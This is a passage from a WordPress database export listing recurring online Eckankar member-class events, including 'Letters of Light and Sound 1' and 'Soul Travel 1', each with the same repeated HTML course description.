20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-03-21','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-21#038;p=262789',0,'tribe_events','',0),(262794,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-04-18','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-18#038;p=262789',0,'tribe_events','',0),(262795,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-05-16','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-16#038;p=262789',0,'tribe_events','',0),(262796,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-06-20','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-20#038;p=262789',0,'tribe_events','',0),(262797,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-07-18','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-18#038;p=262789',0,'tribe_events','',0),(262798,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-08-15','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-15#038;p=262789',0,'tribe_events','',0),(262799,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-09-19','','','2020-12-09 10:56:44','2020-12-09 17:56:44','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-19#038;p=262789',0,'tribe_events','',0),(262800,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-10-17','','','2020-12-09 10:56:45','2020-12-09 17:56:45','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-17#038;p=262789',0,'tribe_events','',0),(262801,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way','','','2020-12-09 10:57:50','2020-12-09 17:57:50','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262801',0,'tribe_events','',0),(262803,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-01-17','','','2020-12-09 10:57:50','2020-12-09 17:57:50','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-17#038;p=262801',0,'tribe_events','',0),(262804,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-02-21','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-21#038;p=262801',0,'tribe_events','',0),(262805,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-03-21','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-21#038;p=262801',0,'tribe_events','',0),(262806,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-04-18','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-18#038;p=262801',0,'tribe_events','',0),(262807,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-05-16','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-16#038;p=262801',0,'tribe_events','',0),(262808,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-06-20','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-20#038;p=262801',0,'tribe_events','',0),(262809,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-07-18','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-18#038;p=262801',0,'tribe_events','',0),(262810,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-08-15','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-15#038;p=262801',0,'tribe_events','',0),(262811,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-09-19','','','2020-12-09 10:57:51','2020-12-09 17:57:51','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-19#038;p=262801',0,'tribe_events','',0),(262812,2,'2020-12-09 10:48:09','2020-12-09 17:48:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 1 – The Illuminated Way\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – Soul Travel 1 – The Illuminated Way','','publish','closed','closed','','online-member-class-soul-travel-1-the-illuminated-way-2021-10-17','','','2020-12-09 10:57:52','2020-12-09 17:57:52','',262801,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-17#038;p=262801',0,'tribe_events','',0),(262813,2,'2020-12-09 10:50:35','0000-00-00 00:00:00','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\n</strong></span></p>\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class – The Secret Way','','draft','closed','closed','','','','','2020-12-09 10:50:35','2020-12-09 17:50:35','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262813',0,'tribe_events','',0),(262814,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where 